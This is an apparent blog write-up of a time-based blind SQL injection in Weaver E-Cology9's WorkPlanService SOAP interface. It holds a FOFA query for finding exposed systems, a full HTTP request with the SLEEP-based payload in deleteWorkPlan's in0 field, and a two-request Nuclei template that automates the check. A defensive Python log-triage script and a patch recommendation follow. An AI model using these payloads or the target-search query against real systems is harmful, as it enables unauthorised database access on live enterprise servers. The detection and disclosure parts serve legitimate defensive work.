E-Cology9 WorkPlanService SQL Injection

0x01 Product Overview

Weaver (泛微) E-Cology9 is an efficient, flexible and comprehensive enterprise office automation (OA) system developed by Weaver Network Technology Co., Ltd.

0x02 Vulnerability Description

The /services/WorkPlanService interface of Weaver E-Cology9 contains a SQL injection vulnerability. An attacker can craft a SOAP request to inject SQL, read or modify sensitive data in the database, and with further exploitation may gain control of the target system.

0x03 Affected Versions

Weaver patch package < 10.65.0

0x04 Search Syntax

FOFA

app="泛微-OA(e-cology)"

0x05 Vulnerability Reproduction

System login page (screenshots omitted)

POST /services/WorkPlanService HTTP/2
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 466

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0>
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>

The injection can be exploited in blind form.

Exploitation PoC: the request shown above (time-based blind injection through the in0 parameter of deleteWorkPlan).

Nuclei PoC

id: E-Cology9-WorkPlanService-sqli

info:
  name: 泛微E-Cology9 WorkPlanService 前台SQL注入
  author: admin
  severity: high
  tags: oa,sqli,ecology

http:
  - raw:
      - |
        POST /services/WorkPlanService HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
        Content-Type: text/xml;charset=UTF-8
        Connection: close

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
        <soapenv:Header/>
        <soapenv:Body>
        <web:deleteWorkPlan>
        <web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0>
        <web:in1>22</web:in1>
        </web:deleteWorkPlan>
        </soapenv:Body>
        </soapenv:Envelope>

      - |
        POST /services/WorkPlanService HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
        Content-Type: text/xml;charset=UTF-8
        Connection: close

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
        <soapenv:Header/>
        <soapenv:Body>
        <web:deleteWorkPlan>
        <web:in0>(SELECT 8544 FROM (SELECT(SLEEP(10-(IF(27=27,0,5)))))NZeo)</web:in0>
        <web:in1>22</web:in1>
        </web:deleteWorkPlan>
        </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "deleteWorkPlanResponse"

      - type: dsl
        dsl:
          - 'duration_1>=6 && duration_1<=7'
          - 'duration_2>=10 && duration_2<=11'
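As an added example from the defender's side (not code from the original write-up or from Weaver), the following Python triage script parses SOAP bodies posted to /services/WorkPlanService, flags deleteWorkPlan arguments that are not plain numeric IDs or that carry SQL-like tokens, and adds the response-latency signal that the Nuclei template's duration_1/duration_2 matchers rely on. It assumes, which the page does not state, that in0/in1 are integer IDs; the sample bodies are constructed, the first being the payload shown in this write-up.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples: the first is the time-based payload from this write-up,
# the second a well-formed call with plain numeric arguments.
MALICIOUS_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/><soapenv:Body><web:deleteWorkPlan>
<web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0>
<web:in1>22</web:in1></web:deleteWorkPlan></soapenv:Body></soapenv:Envelope>"""
BENIGN_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/><soapenv:Body><web:deleteWorkPlan>
<web:in0>15</web:in0><web:in1>22</web:in1></web:deleteWorkPlan></soapenv:Body></soapenv:Envelope>"""

# Assumption (not stated on the page): deleteWorkPlan's in0/in1 are integer IDs.
INTEGER_ONLY = re.compile(r"^\d+$")
SQL_TOKENS = re.compile(r"\b(select|sleep|benchmark|union|waitfor)\b|[()'\"]", re.I)
WORKPLAN_NS = "webservices.workplan.weaver.com.cn"  # namespace used in the SOAP request

def inspect_workplan_body(body):
    """Return a list of findings for one SOAP body posted to /services/WorkPlanService."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings = []
    for op in root.iter("{%s}deleteWorkPlan" % WORKPLAN_NS):
        for arg in op:  # child elements in0, in1, ... (ET renders tags as '{ns}name')
            name, value = arg.tag.rsplit("}", 1)[-1], (arg.text or "").strip()
            if not INTEGER_ONLY.match(value):
                findings.append(f"{name}: non-numeric argument {value[:40]!r}")
            if SQL_TOKENS.search(value):
                findings.append(f"{name}: SQL-like tokens in argument")
    return findings

def triage(records, slow_seconds=5.0):
    """records: iterable of (path, body, duration_s). Flags WorkPlanService calls whose
    arguments look injected or whose latency matches a SLEEP()-style delay, the same
    signal the Nuclei template's duration_1/duration_2 matchers rely on."""
    flagged = []
    for path, body, duration in records:
        if path != "/services/WorkPlanService":
            continue
        findings = inspect_workplan_body(body)
        if duration >= slow_seconds:
            findings.append(f"response took {duration:.1f}s (time-based blind SQLi signature)")
        if findings:
            flagged.append((path, findings))
    return flagged
```

Feed it (path, body, duration) tuples from the web server or WAF log of the OA host; a benign call yields no findings, while the write-up's payload yields both argument findings plus the latency hit when the SLEEP(5) actually fired.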

0x06 Remediation

Apply the updated vendor patch package.

Source: https://tsy244.github.io/2024/08/01/漏洞复现/E-Cology9-WorkPlanService-sql注入/
Author: August Rosenberg
Posted on: August 1, 2024